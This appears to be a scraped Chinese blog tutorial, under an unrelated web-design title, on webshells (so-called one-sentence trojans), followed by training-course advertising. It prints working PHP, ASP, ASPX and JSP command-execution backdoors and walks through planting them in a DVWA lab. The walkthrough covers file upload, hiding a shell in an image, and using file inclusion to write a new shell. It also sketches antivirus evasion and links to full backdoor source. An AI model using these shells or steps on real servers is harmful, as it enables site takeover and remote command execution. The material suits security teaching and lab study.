济源网站建设的公司百度站长收录

济源网站建设的公司,百度站长收录,设计网站流程,高端网站建设要多少钱概述 在很多的渗透过程中#xff0c;渗透人员会上传一句话木马#xff08;简称Webshell#xff09;到目前web服务目录继而提权获取系统权限#xff0c;不论asp、php、jsp、aspx都是如此#xff0c;那么一句话木马到底是什么呢? 先来看看最简单的一句话木马#xff1a;…概述在很多的渗透过程中渗透人员会上传一句话木马简称Webshell到目前web服务目录继而提权获取系统权限不论asp、php、jsp、aspx都是如此那么一句话木马到底是什么呢?先来看看最简单的一句话木马?php eval($_POST[attack]);?【基本原理】利用文件上传漏洞往目标网站中上传一句话木马然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。表示后面即使执行错误也不报错。eval函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[attack]表示从页面中获得attack这个参数值。入侵条件其中只要攻击者满足三个条件就能实现成功入侵1木马上传成功未被杀 2知道木马的路径在哪 3上传的木马能正常运行。常见形式常见的一句话木马php的一句话木马 ?php eval($_POST[pass]);? asp的一句话是 %eval request (pass)% aspx的一句话是 % Page LanguageJscript% %eval(Request.Item[pass],unsafe);%我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上或者直接创建一个新的文件在里面写入这些语句然后把文件上传到网站上即可。基本原理首先我们先看一个原始而又简单的php一句话木马?php eval($_POST[cmd]); ?看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言或者初级的安全爱好者或者脚本小子而言看到的第一眼就是密码是cmd通过post提交数据但是具体如何执行的却不得而知下面我们分析一句话是如何执行的。这句话什么意思呢1php的代码要写在?php ?里面服务器才能认出来这是php代码然后才去解析。2符号的意思是不报错即使执行错误也不报错。为什么呢因为一个变量没有定义就被拿去使用了服务器就善意的提醒Notice你的xxx变量没有定义。这不就暴露了密码吗所以我们加上。3为什么密码是cmd呢那就要来理解这句话的意思了。php里面几个超全局变量$_GET、$_POST就是其中之一。$_POST[a]; 的意思就是a这个变量用post的方法接收。注释传输数据的两种方法get、postpost是在消息体存放数据get是在消息头的url路径里存放数据例如xxx.php?a24如何理解eval()函数eval()把字符串作为PHP代码执行。例如eval(echo a);其实就等于直接echo a;再来看看?php eval($_POST[pw]); ?首先用post方式接收变量pw比如接收到了pwecho a;这时代码就变成?php eval(echo a;); ?。结果如下连起来意思就是用post方法接收变量pw把变量pw里面的字符串当做php代码来执行。所以也就能这么玩也就是说你想执行什么代码就把什么代码放进变量pw里用post传输给一句话木马。你想查看目标硬盘里有没有小黄片可以用php函数opendir()和readdir()等等。想上传点小黄片诬陷站主就用php函数move_uploaded_file当然相应的html要写好。你想执行cmd命令则用exec()。当然前提是php配置文件php.ini里关掉安全模式safe_mode off然后再看看 禁用函数列表 disable_functions proc_open, popen, exec, system, shell_exec 把exec去掉确保没有exec有些cms为了方便处理某些功能会去掉的。来看看效果POST代码如下cmdheader(Content-type:text/html;charsetgbk); exec(ipconfig,$out); echo pre; print_r($out); echo /pre;在这里我们可以看到系统直接执行了系统命令。SO,大家现在应该理解为什么说一句话短小精悍了吧木马利用以下通过DVWA的文件上传漏洞来看看一句话木马如何使用。关于文件上传漏洞可阅读以下文章文件上传漏洞。中国菜刀【实验准备】首先在本地桌面保存一句话木马文件Hack.php(用记事本编写后修改文件后缀即可?php eval($_POST[pass]);?接下来进入DVWA平台http://127.0.0.1:8088/DVWA/index.php 准备开始实验。在Low 安全级别下,查看后台源码?php if( isset( $_POST[ Upload ] ) ) { // Where are we going to be writing to? $target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/; $target_path . basename( $_FILES[ uploaded ][ name ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ uploaded ][ tmp_name ], $target_path ) ) { // No echo preYour image was not uploaded./pre; } else { // Yes! echo pre{$target_path} succesfully uploaded!/pre; } } ?从源码中发现low级别未对上传的文件进行任何验证。所以可以直接上传PHP或者ASP一句话木马此例采用php。1我们将准备好的一句话木马直接上传然后就可以看到回显的路径2接着就可以用菜刀连接了菜刀界面右键然后点击添加。然后填写相关的数据如下图“中国菜刀”页面操作说明1、是连接的URL就是网站的主路径然后加上上传文件时回显的保存路径2、是菜刀连接时的密码就是上面图片一句话提交的数据本例为pass)3、是一句话的解析类型可以是aspphpaspx。不同的解析类型的一句话内容不一样文件后缀名不一样。3然后可以看连接成功的界面4接着双击或者右键“文件管理”进入以下界面我们看到了整个网站的结构和文件甚至是暴漏了我整个电脑主机的磁盘存储可以进行任意非法增删查改网站主机至此沦陷……图片木马木马如何才能上传成功通常防御者都会对类型、大小、进行过滤。另外若规定是上传的图片还会对图片进行采集。即使攻击者修改文件类型也过不了图片采集那一关。所以这就需要一张图片来做掩护。做成隐藏在图片下的木马。linux和windows都有相应的命令能够让一个文件融合到另一个文件后面达到隐藏的目的。承接上面DVWA实验High 安全等级继续先查看源码?php if( isset( $_POST[ Upload ] ) ) { // Where are we going to be writing to? $target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/; $target_path . basename( $_FILES[ uploaded ][ name ] ); // File information $uploaded_name $_FILES[ uploaded ][ name ]; $uploaded_ext substr( $uploaded_name, strrpos( $uploaded_name, . ) 1); $uploaded_size $_FILES[ uploaded ][ size ]; $uploaded_tmp $_FILES[ uploaded ][ tmp_name ]; // Is it an image? if( ( strtolower( $uploaded_ext ) jpg || strtolower( $uploaded_ext ) jpeg || strtolower( $uploaded_ext ) png ) ( $uploaded_size 100000 ) getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No echo preYour image was not uploaded./pre; } else { // Yes! echo pre{$target_path} succesfully uploaded!/pre; } } else { // Invalid file echo preYour image was not uploaded. We can only accept JPEG or PNG images./pre; } } ?可以看到High级别的代码读取文件名中最后一个”.”后的字符串期望通过文件名来限制文件类型因此要求上传文件名形式必须是“*.jpg”、“.jpeg”、“*.png”之一。同时getimagesize函数更是限制了上传文件的文件头必须为图像类型。我们需要将上传文件的文件头伪装成图片首先利用copy命令将一句话木马文件Hack.php与正常的图片文件ClearSky.jpg合并【备注】以下为CMD下用copy命令制作“图片木马”的步骤其中ClearSky.jpg/b中“b”表示“二进制文件”hack.php/a中“a表示ASCII码文件。生成带有木马的图片文件hack.jpg接着我们打开生成的图片木马文件我们可以看到一句话木马已附在图片文件末尾然后我们试着将生成的木马图片文件hack.jpg上传上传成功访问图片木马接下来上菜刀但是由于是图片木马PHP脚本并无法被解析菜刀连接木马失败既然图片木马也无法解析那该怎么办High级别的程序只允许上传图片啊……别慌此处结合DVWA靶场自带的文件包含漏洞即可成功上传PHP木马并上菜刀连接了下面进行攻击演示。首先通过上述方法制造新的图片木马图片文件后面的PHP脚本更改为?php fputs(fopen(muma.php,w),?php eval($_POST[hack]);?); ?然后制作新的图片木马如下图所示接着上传到DVWA然后借助文件包含漏洞模块访问该木马文件访问的地址如下http://10.27.25.118:8088/DVWA/vulnerabilities/fi/?pagefile:///C:\SoftWare\PhpStudy2016\WWW\DVWA\hackable\uploads\hacker.jpg如下图所示此时在DVWA文件包含漏洞的路径下便自动生成了PHP一句话木马脚本文件muma.php如下图所示此时再上菜刀连接即可成功连接至此我们成功结合文件包含漏洞在只能上传图片的文件上传功能处上传图片木马并生成一句话木马。最后附上一篇博文介绍了图片木马解析漏洞的利用PHP图片木马。木马免杀就算木马能正常运行那么过段时间会不会被管理员杀掉如何免杀上面虽然木马上传成功了但是只要管理员一杀毒全部都能杀出来。而且还会很明确的说这是后门。因此作为攻击者就得会各种免杀技巧。防御者的防御很简单什么时候哪个论坛爆出新的免杀技巧安全人员立马将这玩意儿放入黑名单那么这种免杀技巧就失效了。所以攻击者得不断创新发明新的免杀技巧。【免杀思路】1、将源代码进行再次编码。2、将那一句话木马进行base64编码存放在乱七八糟的代码中直接看图3、还是一句话木马进行变形只不过这次的变形是在数组中键值对变形。很强。不得不说免杀的思路真是越猥琐越好。研究起来非常有意思。以后等我渗透熟练了会好好研究一下PHP代码的各种免杀技巧。很好玩思路很猥琐。小马和大马小马和大马都是网页类型中的一种后门是通过用来控制网站权限的那最主要的区别就是小马是用来上传大马的。通过小马上传大马这时候有个疑问了那不是多此一举了为什么要用小马来上传大马而干嘛不直接上传大马用好了。其实这里是因为小马体积小有比大马更强的隐蔽优势而且有针对文件大小上传限制的漏洞所以才有小马小马也通常用来做留备用后门等。网页小马小马体积非常小只有2KB那么大隐蔽性也非常的好因为小马的作用很简单就是一个上传功能就没有其它的了它的作用仅仅是用来上传文件所以也能过一些安全扫描。小马是为了方便上传大马的因为很多漏洞做了上传限制大马上传不了所以就只能先上传小马再接着通过小马上传大马了。小马还可以通过与图片合成一起通过IIS漏洞来运行。Java语言编写的后台咱们使用JSP木马与前面的一句话木马不同菜刀中JSP木马较长以下是一个简单的JSP小马% if(123.equals(request.getParameter(pwd))){ java.io.InputStream in Runtime.getRuntime().exec(request.getParameter(i)).getInputStream(); int a -1; byte[] b new byte[2048]; out.print(pre); while((ain.read(b))!-1){ out.println(new String(b)); } out.print(/pre); } %成功上传后如果能解析的话请求http://服务器IP:端口/Shell/cmd.jsp?pwd123iipconfig即可执行命令。网页大马大马的体积就比较大了通常在50K左右比小马会大好多倍但对应的功能也很强大包括对数据的管理命令的操作数据库的管理解压缩和提权等功能都非常强大。这种大马一旦网站被种了网站基本就在这个大马控制之中。大马的隐蔽性不好因为涉及很多敏感代码安全类程序很容易扫描到。中国菜刀的一句话不算菜刀一句话通过客户端来操作也非常强大一句话的代码可以和大马实现的一样。我们这里说的小马和大马是指网页类型中的小马就是为了配合上传大马的这是它最主要的作用还有就是小马可以当做备用的后门来使用一般大马容易被发现而小马则更容易隐藏在系统的文件夹中。来看看一个大马利用实例在虚拟机中往DVWA上传PHP大马源码附在最后:访问木马文件123.php提交密码123456后进入大马的功能列表下图所示为文件管理功能继续访问下命令执行功能其他功能不展示了最后附上该PHP大马的代码代码太长百度云盘链接https://pan.baidu.com/s/1XGUp5Q_Q2zn46kcQxE5M3A提取码56pd。另外提供JSP大马的参考地址https://blog.csdn.net/weixin_34248023/article/details/93094456。WebShellWebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境也可以将其称做为一种网页后门。黑客在入侵了一个网站后通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起然后就可以使用浏览器来访问asp或者php后门得到一个命令执行环境以达到控制网站服务器的目的。webshell根据脚本可以分为PHP脚本木马ASP脚本木马也有基于.NET的脚本木马和JSP脚本木马。在国外还有用python脚本语言写的动态网页当然也有与之相关的webshell。webshell根据功能也分为大马、小马和一句话木马例如%eval request(“pass”)%通常把这句话写入一个文档里面然后文件名改成xx.asp。然后传到服务器上面。用eval方法将request(“pass”)转换成代码执行request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。具体分类如下图网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级黑客1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取网络安全大礼包《黑客网络安全入门进阶学习资源包》免费分享7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完·用Python编写漏洞的exp,然后写一个简单的网络爬虫·PHP基本语法学习并书写一个简单的博客系统熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选)·了解Bootstrap的布局或者CSS。8、高级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线很多小伙伴想要一窥网络安全整个体系这里我分享一份打磨了4年已经成功修改到4.0版本的**《平均薪资40w的网络安全工程师学习路线图》**对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。如果你想要入坑黑客网络安全工程师这份282G全网最全的网络安全资料包网络安全大礼包《黑客网络安全入门进阶学习资源包》免费分享​​​​​​学习资料工具包压箱底的好资料全面地介绍网络安全的基础理论包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等将基础理论和主流工具的应用实践紧密结合有利于读者理解各种主流工具背后的实现机制。​​​​​​网络安全源码合集工具包​​​​视频教程​​​​视频配套资料国内外网安书籍、文档工具​​​​​ 因篇幅有限仅展示部分资料需要点击下方链接即可前往获取黑客/网安大礼包CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!特别声明此教程为纯技术分享本文的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失。本文转自网络如有侵权请联系删除。